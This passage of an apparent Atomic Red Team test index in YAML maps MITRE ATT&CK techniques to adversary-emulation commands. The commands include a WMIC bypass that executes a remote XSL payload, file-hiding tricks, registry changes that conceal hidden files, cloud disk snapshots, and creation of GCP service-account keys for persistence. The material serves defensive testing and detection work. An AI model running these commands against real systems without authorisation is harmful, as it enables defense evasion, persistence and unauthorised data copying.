default: PathToAtomicsFolder\T1220\src\wmicscript.xsl
dependency_executor_name: powershell
dependencies:
- description: 'XSL file must exist on disk at specified location (#{local_xsl_file})
'
prereq_command: 'if (Test-Path "#{local_xsl_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{local_xsl_file}") -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
executor:
command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
'
name: command_prompt
- name: WMIC bypass using remote XSL file
auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b
description: 'Executes the code specified within a XSL script using a remote
payload. Open Calculator.exe when test successfully executed, while AV turned
off.
'
supported_platforms:
- windows
input_arguments:
remote_xsl_file:
description: Remote location of an XSL payload.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
wmic_command:
description: WMI command to execute using wmic.exe
type: string
default: process list
executor:
command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
'
name: command_prompt
T1564.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d
created: '2020-02-26T17:46:13.128Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/001
external_id: T1564.001
- source_name: WireLurker
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf
- source_name: Sofacy Komplex Trojan
description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- source_name: Antiquated Mac Malware
description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated
code. Retrieved July 5, 2017.
url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:34.244Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).
On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
Additionally, adversaries may name files in a manner that would allow the file to be hidden such as naming a file only a “space” character.
Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Gr@ve_Rose (tcpdump101.com on bsky)
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_version: '1.2'
identifier: T1564.001
atomic_tests:
- name: Create a hidden file in a hidden directory
auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
description: 'Creates a hidden file inside a hidden directory
'
supported_platforms:
- linux
- macos
executor:
command: |
mkdir /var/tmp/.hidden-directory
echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
'
name: sh
- name: Mac Hidden file
auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9
description: 'Hide a file on MacOS
'
supported_platforms:
- macos
executor:
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
40 00 FF FF FF FF 00 00"
'
name: sh
- name: Create Windows System File with Attrib
auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32
description: |
Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
and observe that the Attributes are "SA" for System and Archive.
supported_platforms:
- windows
input_arguments:
file_to_modify:
description: File to modify using Attrib command
type: string
default: "%temp%\\T1564.001.txt"
dependency_executor_name: command_prompt
dependencies:
- description: 'The file must exist on disk at specified location (#{file_to_modify})
'
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
'
executor:
command: 'attrib.exe +s #{file_to_modify}
'
cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: Create Windows Hidden File with Attrib
auto_generated_guid: dadb792e-4358-4d8d-9207-b771faa0daa5
description: |
Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes are "SH" for System and Hidden.
supported_platforms:
- windows
input_arguments:
file_to_modify:
description: File to modify using Attrib command
type: string
default: "%temp%\\T1564.001.txt"
dependency_executor_name: command_prompt
dependencies:
- description: 'The file must exist on disk at specified location (#{file_to_modify})
'
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
'
executor:
command: 'attrib.exe +h #{file_to_modify}
'
cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: Hidden files
auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379
description: 'Requires Apple Dev Tools
'
supported_platforms:
- macos
input_arguments:
filename:
description: path of file to hide
type: path
default: "/tmp/evil"
executor:
command: 'setfile -a V #{filename}
'
name: sh
- name: Hide a Directory
auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3
description: 'Hide a directory on MacOS
'
supported_platforms:
- macos
executor:
command: |
touch /var/tmp/T1564.001_mac.txt
chflags hidden /var/tmp/T1564.001_mac.txt
cleanup_command: 'rm /var/tmp/T1564.001_mac.txt
'
name: sh
- name: Show all hidden files
auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c
description: 'Show all hidden files on MacOS
'
supported_platforms:
- macos
executor:
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
'
name: sh
- name: Hide Files Through Registry
auto_generated_guid: f650456b-bd49-4bc1-ae9d-271b5b9581e7
description: "Disable Show Hidden files switch in registry. This technique was
abused by several malware to hide their files from normal user.\nSee how this
trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx
\n"
supported_platforms:
- windows
executor:
command: |
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Create Windows Hidden File with powershell
auto_generated_guid: 7f66d539-4fbe-4cfa-9a56-4a2bf660c58a
description: |
Creates a file and marks it as hidden through powershell. Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes is "H" Hidden.
supported_platforms:
- windows
input_arguments:
file_to_modify:
description: File to modify
type: string
default: "%temp%\\T1564.001-9.txt"
dependency_executor_name: command_prompt
dependencies:
- description: 'The file must exist on disk at specified location (#{file_to_modify})
'
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: 'echo system_Attrib_T1564.001-9 >> #{file_to_modify}
'
executor:
command: |
$file = Get-Item $env:temp\T1564.001-9.txt -Force
$file.attributes='Hidden'
cleanup_command: 'cmd /c ''del /A:H #{file_to_modify} >nul 2>&1''
'
name: powershell
elevation_required: true
- name: Create Windows System File with powershell
auto_generated_guid: d380c318-0b34-45cb-9dad-828c11891e43
description: |
Creates a file and marks it as System through powershell. Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes is "S" System.
supported_platforms:
- windows
input_arguments:
file_to_modify:
description: File to modify
type: string
default: "%temp%\\T1564.001-10.txt"
dependency_executor_name: command_prompt
dependencies:
- description: 'The file must exist on disk at specified location (#{file_to_modify})
'
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: 'echo system_Attrib_T1564.001-10 >> #{file_to_modify}
'
executor:
command: |
$file = Get-Item $env:temp\T1564.001-10.txt -Force
$file.attributes='System'
cleanup_command: 'cmd /c ''del /A:H #{file_to_modify} >nul 2>&1''
'
name: powershell
elevation_required: true
T1578.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
created: '2020-06-09T15:33:13.563Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/001
external_id: T1578.001
- source_name: AWS Cloud Trail Backup API
description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
Retrieved April 27, 2020.
url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- source_name: GCP - Creating and Starting a VM
description: Google. (2020, April 23). Creating and Starting a VM instance.
Retrieved May 1, 2020.
url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- source_name: Cloud Audit Logs
description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
url: https://cloud.google.com/logging/docs/audit#admin-activity
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved November
17, 2024.
url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Azure - Monitor Logs
description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
Retrieved May 1, 2020.
url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:34.416Z'
name: 'Modify Cloud Compute Infrastructure: Create Snapshot'
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
x_mitre_version: '1.2'
identifier: T1578.001
atomic_tests:
- name: AWS - Create Snapshot from EBS Volume
auto_generated_guid: a3c09662-85bb-4ea8-b15b-6dc8a844e236
description: |
Creates an EBS snapshot in AWS using the AWS CLI.
This simulates an adversary duplicating volume data via snapshots for persistence or exfiltration.
supported_platforms:
- iaas:aws
input_arguments:
aws_region:
description: AWS region where the volume is located.
type: string
default: us-east-1
aws_volume_id:
description: The AWS EBS Volume ID to create a snapshot from.
type: string
default: vol-0123456789abcdef0
dependencies:
- description: AWS CLI must be installed.
prereq_command: 'if command -v aws > /dev/null 2>&1; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "Install AWS CLI: https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html"
'
- description: AWS CLI must be authenticated.
prereq_command: 'if aws sts get-caller-identity --region #{aws_region} > /dev/null
2>&1; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "Configure AWS credentials with: aws configure"
'
- description: EBS volume must exist.
prereq_command: 'if aws ec2 describe-volumes --volume-ids #{aws_volume_id}
--region #{aws_region} > /dev/null 2>&1; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "Ensure the volume ID exists in the target AWS account
and region."
'
executor:
name: sh
elevation_required: false
command: 'aws ec2 create-snapshot --region #{aws_region} --volume-id #{aws_volume_id}
--description "Atomic Red Team Test Snapshot" --query "SnapshotId" --output
text
'
cleanup_command: |
SNAPSHOT_ID=$(aws ec2 describe-snapshots --region #{aws_region} --filters "Name=volume-id,Values=#{aws_volume_id}" --query "Snapshots[0].SnapshotId" --output text)
if [ "$SNAPSHOT_ID" != "None" ]; then
aws ec2 delete-snapshot --region #{aws_region} --snapshot-id "$SNAPSHOT_ID"
fi
- name: Azure - Create Snapshot from Managed Disk
auto_generated_guid: 89e69b4b-3458-4ec6-b819-b3008debc1bc
description: |
Creates a snapshot of a managed disk in Azure using the Azure CLI.
Simulates adversary snapshotting behavior for persistence or data duplication.
supported_platforms:
- iaas:azure
input_arguments:
azure_resource_group:
description: The Azure resource group where the disk is located.
type: string
default: myResourceGroup
azure_disk_name:
description: The Azure disk name.
type: string
default: myDiskName
azure_snapshot_name:
description: The Azure snapshot name.
type: string
default: mySnapshotName
dependencies:
- description: Azure CLI must be installed.
prereq_command: 'if command -v az > /dev/null 2>&1; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "Install Azure CLI: https://learn.microsoft.com/en-us/cli/azure/install-azure-cli"
'
- description: Azure CLI must be authenticated.
prereq_command: 'if az account show > /dev/null 2>&1; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "Login with: az login"
'
- description: Azure disk must exist.
prereq_command: 'if az disk show --resource-group #{azure_resource_group}
--name #{azure_disk_name} > /dev/null 2>&1; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "Ensure the disk exists in the given resource group."
'
executor:
name: sh
elevation_required: false
command: 'az snapshot create --resource-group #{azure_resource_group} --name
#{azure_snapshot_name} --source #{azure_disk_name} --location eastus
'
cleanup_command: 'az snapshot delete --resource-group #{azure_resource_group}
--name #{azure_snapshot_name}
'
- name: GCP - Create Snapshot from Persistent Disk
auto_generated_guid: e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d
description: |
Creates a snapshot of a persistent disk in GCP using the gcloud CLI.
Emulates adversary behavior to gain access to volume data or replicate environment state.
supported_platforms:
- iaas:gcp
input_arguments:
gcp_disk_name:
description: The Google Cloud disk name.
type: string
default: myDiskName
gcp_zone:
description: The Google Cloud zone where the disk is located.
type: string
default: us-central1-a
gcp_snapshot_name:
description: The Google Cloud snapshot name.
type: string
default: mySnapshotName
dependencies:
- description: gcloud CLI must be installed.
prereq_command: 'if command -v gcloud > /dev/null 2>&1; then exit 0; else
exit 1; fi
'
get_prereq_command: 'echo "Install gcloud CLI: https://cloud.google.com/sdk/docs/install"
'
- description: gcloud CLI must be authenticated.
prereq_command: 'if gcloud auth list --filter=status:ACTIVE --format="value(account)"
| grep . > /dev/null; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "Authenticate with: gcloud auth login"
'
- description: GCP disk must exist.
prereq_command: 'if gcloud compute disks describe #{gcp_disk_name} --zone=#{gcp_zone}
> /dev/null 2>&1; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "Ensure the disk exists in the specified zone."
'
executor:
name: sh
elevation_required: false
command: 'gcloud compute snapshots create #{gcp_snapshot_name} --source-disk=#{gcp_disk_name}
--zone=#{gcp_zone}
'
cleanup_command: 'gcloud compute snapshots delete #{gcp_snapshot_name} --quiet
'
T1550.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51
created: '2020-01-30T17:37:22.261Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/001
external_id: T1550.001
- source_name: Crowdstrike AWS User Federation Persistence
description: " Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries
Can Persist with AWS User Federation. Retrieved March 10, 2023."
url: https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/
- source_name: Auth0 - Why You Should Always Use Access Tokens to Secure APIs
Sept 2019
description: Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure
APIs. Retrieved September 12, 2019.
url: https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
- source_name: AWS Logging IAM Calls
description: AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail.
Retrieved April 1, 2022.
url: https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html
- source_name: AWS Temporary Security Credentials
description: AWS. (n.d.). Requesting temporary security credentials. Retrieved
April 1, 2022.
url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html
- source_name: Microsoft Identity Platform Access 2019
description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27).
Microsoft identity platform access tokens. Retrieved October 4, 2019.
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
- source_name: Google Cloud Service Account Credentials
description: Google Cloud. (2022, March 31). Creating short-lived service
account credentials. Retrieved April 1, 2022.
url: https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials
- source_name: GCP Monitoring Service Account Usage
description: Google Cloud. (2022, March 31). Monitor usage patterns for service
accounts and keys . Retrieved April 1, 2022.
url: https://cloud.google.com/iam/docs/service-account-monitoring
- source_name: okta
description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved
September 12, 2019.
url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
- source_name: Rhino Security Labs Enumerating AWS Roles
description: 'Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating
AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.'
url: https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration
- source_name: Staaldraad Phishing with OAuth 2017
description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure.
Retrieved October 4, 2019.
url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:35.227Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
or services on remote systems. These tokens are typically stolen from users
or services and used in lieu of login credentials.\n\nApplication access tokens
are used to make authorized API requests on behalf of a user or service and
are commonly used to access resources in cloud, container-based applications,
and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always
Use Access Tokens to Secure APIs Sept 2019) \n\nOAuth is one commonly implemented
framework that issues tokens to users for access to systems. These frameworks
are used collaboratively to verify the user and determine what actions the
user is allowed to perform. Once identity is established, the token allows
actions to be authorized, without passing the actual credentials of the user.
Therefore, compromise of the token can grant the adversary access to resources
of other sites through a malicious application.(Citation: okta)\n\nFor example,
with a cloud-based email service, once an OAuth access token is granted to
a malicious application, it can potentially gain long-term access to features
of the user account if a \"refresh\" token enabling background access is awarded.(Citation:
Microsoft Identity Platform Access 2019) With an OAuth access token an adversary
can use the user-granted REST API to perform functions such as email searching
and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised
access tokens may be used as an initial step in compromising other services.
For example, if a token grants access to a victim’s primary email, the adversary
may be able to extend access to all other services which the target subscribes
by triggering forgotten password routines. In AWS and GCP environments, adversaries
can trigger a request for a short-lived access token with the privileges of
another user account.(Citation: Google Cloud Service Account Credentials)(Citation:
AWS Temporary Security Credentials) The adversary can then use this token
to request data or perform actions the original account could not. If permissions
for this feature are misconfigured – for example, by allowing all users to
request a token for a particular account - an adversary may be able to gain
initial access to a Cloud Account or escalate their privileges.(Citation:
Rhino Security Labs Enumerating AWS Roles)\n\nDirect API access through a
token negates the effectiveness of a second authentication factor and may
be immune to intuitive countermeasures like changing passwords. For example,
in AWS environments, an adversary who compromises a user’s AWS API credentials
may be able to use the `sts:GetFederationToken` API call to create a federated
user session, which will have the same permissions as the original user but
may persist even if the original user credentials are deactivated.(Citation:
Crowdstrike AWS User Federation Persistence) Additionally, access abuse over
an API channel can be difficult to detect even from the service provider end,
as the access can still align well with a legitimate workflow."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
- Mark Wee
- Ian Davila, Tidal Cyber
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- Containers
- IaaS
- Office Suite
- Identity Provider
x_mitre_version: '1.8'
atomic_tests: []
T1078.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
created: '2020-03-13T20:36:57.378Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1078/004
external_id: T1078.004
- source_name: AWS Identity Federation
description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13,
2020.
url: https://aws.amazon.com/identity/federation/
- source_name: SpecterOps Managed Identity 2022
description: 'Andy Robbins. (2022, June 6). Managed Identity Attack Paths,
Part 1: Automation Accounts. Retrieved March 18, 2025.'
url: https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a?gi=6a9daedade1c
- source_name: Google Federating GC
description: Google. (n.d.). Federating Google Cloud with Active Directory.
Retrieved March 13, 2020.
url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction
- source_name: Microsoft Deploying AD Federation
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:35.682Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
or Defense Evasion. Cloud accounts are those created and configured by an
organization for use by users, remote support, services, or for administration
of resources within a cloud service provider or SaaS application. Cloud Accounts
can exist solely in the cloud; alternatively, they may be hybrid-joined between
on-premises systems and the cloud through syncing or federation with other
identity sources such as Windows Active Directory.(Citation: AWS Identity
Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying
AD Federation)\n\nService or user accounts may be targeted by adversaries
through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566),
or various other means to gain access to the environment. Federated or synced
accounts may be a pathway for the adversary to affect both on-premises systems
and cloud environments - for example, by leveraging shared credentials to
log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High
privileged cloud accounts, whether federated, synced, or cloud-only, may also
allow pivoting to on-premises environments by leveraging SaaS-based [Software
Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands
on hybrid-joined devices.\n\nAn adversary may create long lasting [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised
cloud account to maintain persistence in the environment. Such credentials
may also be used to bypass security controls such as multi-factor authentication.
\n\nCloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)
or other privileges through various means within the environment. Misconfigurations
in role assignments or role assumption policies may allow an adversary to
use these mechanisms to leverage permissions outside the intended scope of
the account. Such over privileged accounts may be used to harvest sensitive
data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009)
or other methods. For example, in Azure environments, adversaries may target
Azure Managed Identities, which allow associated Azure resources to request
access tokens. By compromising a resource with an attached Managed Identity,
such as an Azure VM, adversaries may be able to [Steal Application Access
Token](https://attack.mitre.org/techniques/T1528)s to move laterally across
the cloud environment.(Citation: SpecterOps Managed Identity 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Arun Seelagan, CISA
- Eliraz Levi, Hunters Security
- Alon Klayman, Hunters Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Identity Provider
- Office Suite
- SaaS
x_mitre_version: '1.9'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
auto_generated_guid: 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
'
supported_platforms:
- google-workspace
- iaas:gcp
input_arguments:
project-id:
description: ID of the project, you want to create service account as well
as service account key for
type: string
default: art-project-1
service-account-name:
description: Name of the service account
type: string
default: gcp-art-service-account-1
service-account-email:
description: Email of the service account
type: string
default: gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com
output-key-file:
description: Email of the service account
type: string
default: gcp-art-service-account-1.json
executor:
name: sh
elevation_required: false
command: |
gcloud config set project #{project-id}
gcloud iam service-accounts create #{service-account-name}
gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
'
dependency_executor_name: sh
dependencies:
- description: 'Requires gcloud
'
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
'
- description: "Check if user is logged in \n"
prereq_command: 'gcloud config get-value account
'
get_prereq_command: 'gcloud auth login --no-launch-browser
'
- name: Azure Persistence Automation Runbook Created or Modified
auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
description: |
Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
Automation runbook to execute malicious code and maintain persistence in their target's environment.
supported_platforms:
- iaas:azure
input_arguments:
resource_group:
description: Name of the resource group
type: string
default: ART-ResourceGroupName-T1078-004
runbook_name:
description: Name of the runbook name
type: string
default: ART-RunbookName-T1078-004
automation_account_name:
description: Name of the automation account name
type: string
default: ART-AutomationAccountName-T1078-004
dependency_executor_name: powershell
dependencies:
- description: 'Check if terraform is installed.
'
prereq_command: 'terraform version
'
get_prereq_command: 'echo "Please install terraform via https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli
(URL accurate as of Nov. 15, 2024)."
'
- description: |
Check if Azure CLI and Azure Powershell are installed.
* Login to Azure CLI with "az login", and login to Azure Powershell with "Connect-AzAccount". Sessions are not shared.
* Azure Powershell used in this test as they have better automation performance and error logging than Azure CLI.
prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest
-Uri https://aka.ms/installazurecliwindowsx64 -OutFile .\\AzureCLI.msi;
Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet';
Remove-Item .\\AzureCLI.msi\n"
- description: 'Check if the user is logged into Azure.
'
prereq_command: 'try {if (-not (Get-AzContext)) { exit 1 } else { exit 0 }}
catch {exit 1}
'
get_prereq_command: 'echo "* Configure your Azure account using: Connect-AzAccount"
'
- description: |
Create dependency resources using terraform
